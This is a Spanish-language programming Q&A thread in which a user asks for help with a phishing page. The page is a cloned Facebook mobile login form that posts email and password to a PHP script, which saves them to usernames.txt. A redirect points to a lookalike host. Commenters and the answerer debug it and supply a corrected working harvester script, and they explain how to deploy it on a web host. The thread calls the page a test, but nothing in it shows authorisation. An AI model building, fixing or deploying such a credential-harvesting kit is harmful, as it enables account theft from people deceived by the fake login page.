# el codigo no es detectado por el html y no se si es por algun error o por mala ubicacion en el servidor web

Tags: html

```
<?php

$handle = fopen("usernames.txt", "a");

foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "rn");
}

fwrite($handle, "rn");
fclose($handle);

echo "All is well!";

?>


</div><div class="_5rut"><form method="post" action="post.php" class="mobile-login-form _5spm" id="login_form" novalidate="1" data-sigil="m_login_form"><input type="hidden" name="lsd" value="AVqplDZY" autocomplete="off" /><input type="hidden" name="jazoest" value="2731" autocomplete="off" /><input type="hidden" name="m_ts" value="1591462893" /><input type="hidden" name="li" value="7cvbXq80FS8VnGwb1xGSFN7D" /><input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number" /><input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries" /><div id="user_info_container" data-sigil="user_info_after_failure_element"></div><div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div><div id="otp_retrieve_desc_container"></div><div class="_56be _5sob"><div class="_55wo _55x2 _56bf"><div class="_96n9" id="email_input_container"><input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" id="m_login_email" name="email" placeholder="N&#xfa;mero de m&#xf3;vil o correo electr&#xf3;nico" type="text" data-sigil="m_login_email" /></div><div><div class="_1upc _mg8" data-sigil="m_login_password"><div class="_7om2"><div class="_4g34 _5i2i _52we"><div class="_5xu4"><input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2 _8qtm" autocomplete="on" id="m_login_password" name="pass" placeholder="Contrase&#xf1;a" type="password" data-sigil="password-plain-text-toggle-input" /></div></div><div class="_5s61 _216i _5i2i _52we"><div class="_5xu4"><div class="_2pi9" style="display:none" id="u_0_1"><a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" style="display:none" id="u_0_2">OCULTAR</span><span class="mfss" id="u_0_3">MOSTRAR</span></a></div></div></div></div></div></div></div></div><div class="_2pie" style="text-align:center;"><div id="u_0_4" data-sigil="login_password_step_element"><button type="submit" value="Entrar" class="_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu" name="login" data-sigil="touchable login_button_block m_login_button"><span class="_55sr">Entrar</span></button>
```

no me crea el archivo username.txt al momento de ingresar el correo y contraseña, esto es una prueba de phishin pero no me funciona y quiero saber porque, o talves sea la ubicacion del archivo en la carpeta public_html

Comment: Te arroja algun error?, si es asi considera editar la pregunta y poner el error.

Comment: no, simplemente cuando se introduce el corre y contraseña y se le da en login no redirecciona la pagina como debe ser, osea debe decir que la pagina no existe para posteriormente ir al servidor web y ver los datos de la cuenta, pero simplemente se le da en login y no pasa nada

Comment: No entiendo tu codigo, osea ese es el codigo de tu backend, pero en tu backend estas luego redirigiendo al frontend al login de nuevo?

Comment: ya cambié la redireccion pero sigue en las mismas

Answer (score 0):

esta linea:

```
header (‘Location:https://faebokflas.000webhostapp.com/’);
```

como esta al inicio del todo te redirigira a la pagina antes de que se pueda ejecutar todo lo demas, en pocas palabras al llegar a esa parte el codigo deja de ejecutarse y te lleva a la otra pagina, debes quitarla.

Ademas creo que como se trata de una cabecera no podras usar esa manera de llegar al frontend, puesto que **las cabeceras siempre deben estar definidas al inicio del documento.**

si las pones en otra parte generaran un error.

No puedo ayudar mas que decirte que ese es realmente el inconveniente... puesto que no conozco otra forma de redirigir al usuario a otra pagina con **PHP** sin usar cabeceras, deberás investigar esto por tu cuenta...

**EDIT**

he organizado tu codigo y pase por alto que estas usando unas comillas no validas, ademas de que no veo por ninguna parte el inicio del script **PHP** (`<?php`), por lo que decidi acomodarlo y probarlo en local y me funciono:

```
<?php

    $handle = fopen("usernames.txt", "a");

    $_POST["prueba1"] = "esta es la primera prueba";
    $_POST["prueba2"] = "esta es la segunda prueba";
    $_POST["prueba3"] = "esta es la tercera prueba";

    foreach($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "rn");
    }

    fwrite($handle, "rn");
    fclose($handle);

    echo "All is well!";

?>
```

Lo que hice fue cambiar las comillas que usabas: ” por " las cuales **NO** son las mismas, las ultimas son las que deberias usar, ya sea comillas dobles " o comillas simples '.

Comment: muchas gracias.

Comment: funciona?, o aun sigue igual el error?, recuerda que debes enviar datos de POST para poder que no falle

Comment: le quité (‘Location:https://faebokflas.000webhostapp.com/’); y dejé solo header y sigue igual

Comment: yo coloqué el index.htm en el el public_html ytambien puse el php en la misma carpeta, el php deberia ir en esa carpeta o en otra?

Comment: He editado la respuesta, esta vez debera funcionarte el codigo... puse unas variables en POST como ejemplo, pero si deseas puedes quitar esas asignaciones, son solo un ejemplo para que no tuvieses que postear y pudieras probar el codigo directamente.

Comment: el php debe ir en la misma carpeta que el html?, si es así el problema entonces estaria en el html o no?, porque no funciona

Comment: Debes dirigirte al archivo php como tal para poder probar si funciona, tu archivo no debe estar en htaccess, debe estar en htdocs o carpetas dentro de htdocs, el documento por el cual inicia (entry point) siempre debe estar en la raiz de htdocs y debe llamarse ya sea index.html (para los archivos html) o index.php (si estas usando php en ese archivo), si usas un archivo con extension.html para ejecutar php es por eso que no funciona, porque el archivo en el que ejecutas php debe tener extension .php y no .html

Comment: Tambien hay que recordar que PHP es un lenguaje de programacion compilado, que requiere de correr en un servidor, espero estes usando la ruta de localhost para llegar a ese archivo, probarlo con rutas locales hara que el php nunca se ejecute, por que PHP no es nativo de los navegadores, PHP lo compila un servidor, es por eso muy importante que uses uno para ejecutar tu programa, como por ejemplo xampp, xampp te permite arrancar un servidor local en tu PC para ejecutar PHP, muchos conocen esa ruta como localhost.

Comment: el codigo funcionó correctamente pero la pagina que quiero que lo ejecute no lo hace y ya la puse en php y no funciona, nose porque será

Comment: edita el codigo en tu pregunta y pon como estas intentado hacer que se ejecute tu PHP en la pagina que deseas que lo ejecute, recuerda que el archivo debe estar dentro de htdocs o carpetas mas a fondo, cualquier cosa fuera de htdocs es inaccesible.

Comment: así la estoy intentando ejecutar

Comment: Es decir que si lo ejecutas directamente el PHP te funciona, pero si lo intentas desde la otra pagina, (sospecho que desde un formulario en un .html) no te funciona, creo que deberas colocar el formulario y el js minimo que te permite enviar los datos, creo que debe haber algun problema al enviarlos o la URL no se encuentra.

Comment: sigue igual, creo que deberia revisar el codigo de la pagina o no?

Comment: Debes revisarlo, ademas de poner no todo el html y javascript en la pregunta, pero si lo necesario para entender cual es el problema... por ejemplo para entender como exactamente es que envias esa informacion al archivo.

Comment: puse una parte del codigo, lo que alteré, es que esto es una prueba de phishing entonces alteré el action="(redireccion de la pagina)" con action="post.php" el post.php es el nombre que le asigné al codigo que quiero ejecutar